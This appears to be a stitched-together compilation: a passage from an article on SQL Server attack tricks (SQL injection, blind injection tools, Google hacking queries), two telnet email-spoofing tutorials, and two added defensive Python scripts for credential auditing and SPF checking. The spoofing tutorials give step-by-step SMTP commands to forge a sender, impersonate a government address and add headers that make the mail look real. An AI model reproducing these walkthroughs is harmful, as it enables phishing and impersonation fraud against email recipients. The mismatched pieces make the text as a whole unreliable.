SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break-in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
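For tricks 4, 9 and 10, a self-audit you can run over your own code base and page output before anyone else does. This is an added example, not from the original article; the ASP snippet, host name, response body and finding labels are constructed for illustration.

```python
import re

# Connection-string keywords that carry SQL Server credentials.
CRED_RE = re.compile(r"(?i)\b(password|pwd)\s*=\s*([^;\"']*)")
USER_RE = re.compile(r"(?i)\b(user id|uid)\s*=\s*([^;\"']*)")
# Error text the article names as leaking from publicly accessible systems.
ERROR_MARKERS = ("Incorrect syntax near",)

# Constructed sample inputs (not taken from any real site).
SAMPLE_ASP = '''<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB;Data Source=db01;Initial Catalog=shop;User ID=sa;Password=;"
conn2.Open "Provider=SQLOLEDB;Data Source=db01;uid=webapp;pwd=EXAMPLE-ONLY;"
conn3.Open "Provider=SQLOLEDB;Data Source=db01;Integrated Security=SSPI;"
%>'''
SAMPLE_BODY = "<p>Microsoft OLE DB Provider for SQL Server: Incorrect syntax near 'x'.</p>"


def audit_source(name: str, text: str) -> list:
    """Flag lines of a script that embed SQL Server credentials."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        cred = CRED_RE.search(line)
        if not cred:
            continue  # e.g. integrated authentication, nothing stored in the file
        user = USER_RE.search(line)
        login = user.group(2).strip().lower() if user else ""
        secret = cred.group(2).strip()
        if login == "sa" and secret == "":
            findings.append((name, lineno, "blank-sa-password"))
        elif login == "sa":
            findings.append((name, lineno, "sa-credentials-in-source"))
        else:
            findings.append((name, lineno, "credentials-in-source"))
    return findings


def audit_response(url: str, body: str) -> list:
    """Flag response bodies that leak raw SQL Server error text."""
    return [(url, marker) for marker in ERROR_MARKERS if marker in body]


if __name__ == "__main__":
    print(audit_source("default.asp", SAMPLE_ASP))
    print(audit_response("/item.asp", SAMPLE_BODY))
```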

Well, let's get started then. In order to fake (spoof) an email, you first need to have an SMTP (Simple Mail Transfer Protocol) server that you can use to send the email from. How do you find one? Simple.

First decide what server you want to use to send email from, for this example I will use Hotmail. Now go to Start --> Run --> Type the word 'cmd' without the '
Now that you have DOS open, type the following command:

nslookup -querytype=mx hotmail.com

You can replace hotmail.com with whatever site's mail servers you want to use. Anyway, when you execute that command, the following output comes out:

Non-authoritative answer:
hotmail.com MX preference = 5, mail exchanger = mx2.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx3.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx4.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx1.hotmail.com
The SMTP servers are mx2.hotmail.com, mx3.hotmail.com, etc. Now, for the next part of the tutorial, I will be using mx2.hotmail.com.

Now, let's get started spoofing the actual email! You still have DOS open right, good. Now type the following command to connect with Hotmail's SMTP server. You can replace the server name with your preferred server.

telnet mx2.hotmail.com 25

You will see whatever welcome message they give. Now type the following command:

HELO

You'll get a message, usually with your IP. Now the next command shows what email you want to pretend to be sending from. I'll use the fake email lala@lala.org

MAIL FROM: lala@lala.org

You should get a 250 OK. Now we will type a command to choose who we want the email to go to. I will use the fake email blah@blah.com

RCPT TO: blah@blah.com

Now you get another 250 OK. Now we will start the actual message. Type:

DATA

Then type your message. Be sure to add title headers, like Subject, To, From, etc. so the email looks real. After you are done typing the email, press Enter, then type a . then press Enter again. Your email has been sent!


Now type quit to end the connection to the server.

That's all for now, hope you learned something!


So, you want to learn how to send your own fake mail? It's extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux - any modern PC that has an internet connection will do it.

There are just a few simple steps. First, you'll need to decide on the FROM and the TO email addresses. If the FROM address that you're choosing isn't a real one, make sure that the domain name (the bit after the @ sign) is a real one. If it's not a real one, it almost certainly won't work.

For the purpose of this tutorial, we'll be sending from bush@whitehouse.gov to dummy@anysite.com.

Second, you'll need to find out the mail server that your recipient is using.


Click Start, Run, enter "CMD", then press OK. In the window that comes up, type nslookup -q=MX anysite.com


Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com


Bring up your favorite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen - all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest "preference number".

anysite.com        MX preference = 10, mail exchanger = mail.anysite.com


Now, you'll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default - see this note about getting telnet on Vista before you continue. When you're ready, type:



telnet mail.anysite.com 25


Press enter, and after a short pause, you should see a welcome message from the server.



Ok, so now you're connected. You need to enter the following information - press ENTER at each new line. You won't be able to press backspace to delete a mistake, so you'll need to type everything correctly first time!



HELO whitehouse.gov

This tells the mail server that we are "whitehouse.gov".

MAIL FROM: <bush@whitehouse.gov>

This tells the server who is sending the mail.

RCPT TO: <dummy@anysite.com>

This tells the server who to deliver the mail to. At this point, if the recipient doesn't exist, you may see a warning message (but not always).

DATA


This tells the server that we're ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don't forget that full stop at the end.



Hello dummy@anysite, I managed to send a fake mail all by myself!
.


Don't forget that last dot. When you've done that, and pressed enter, simply enter QUIT and your mail should be delivered.



There's a little bit more to it, of course. You'll need to enter proper "headers" if you want the mail to look more believable. After doing the DATA command, I'd recommend pasting in the following "headers" to make sure it looks realistic when viewed in Outlook, Hotmail, etc.



Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)
From: George W Bush
To: Poor Sod
Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!
.


And that's all there is to it.
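Both walkthroughs above work because SMTP accepts whatever MAIL FROM and From: the client types; the receiving side catches it by checking the connecting IP against the SPF record of the MAIL FROM domain and comparing that domain with the From: header. The following is an added example, not from the original posts: the domains, IP addresses and SPF record are constructed, and only the `ip4`, `ip6` and `all` mechanisms are evaluated (the others need DNS lookups).

```python
import ipaddress
from email import message_from_string
from email.utils import parseaddr

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
# Constructed sample data: a published SPF record and one received message.
SPF_RECORDS = {"example.org": "v=spf1 ip4:192.0.2.0/24 -all"}
MESSAGE = "From: Some Sender <sender@example.org>\nSubject: Hello\n\nBody text\n"


def spf_check(record: str, client_ip: str) -> str:
    """Evaluate the ip4/ip6/all mechanisms of an SPF record, left to right."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"  # the domain publishes no SPF policy
    ip = ipaddress.ip_address(client_ip)
    for term in terms[1:]:
        qualifier = "+"  # default qualifier when none is written
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        if mech.lower() == "all":
            return QUALIFIERS[qualifier]
        if mech.lower() in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
        # a, mx, include, exists, ... are skipped in this offline example
    return "neutral"


def domain_of(address: str) -> str:
    return parseaddr(address)[1].rpartition("@")[2].lower()


def assess(client_ip: str, mail_from: str, raw_message: str, spf_records: dict):
    """Return (spf_result, from_aligned) for one SMTP transaction."""
    envelope_domain = domain_of(mail_from)
    result = spf_check(spf_records.get(envelope_domain, ""), client_ip)
    header_from = message_from_string(raw_message)["From"] or ""
    aligned = domain_of(header_from) == envelope_domain
    return result, aligned


if __name__ == "__main__":
    # A sender outside the published range, as in the telnet sessions above.
    print(assess("198.51.100.7", "<sender@example.org>", MESSAGE, SPF_RECORDS))
```

A `fail` result with an aligned From: domain is the case a DMARC `reject` policy is meant to stop; a domain with no SPF record returns `none` and gives the receiver nothing to check.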



 


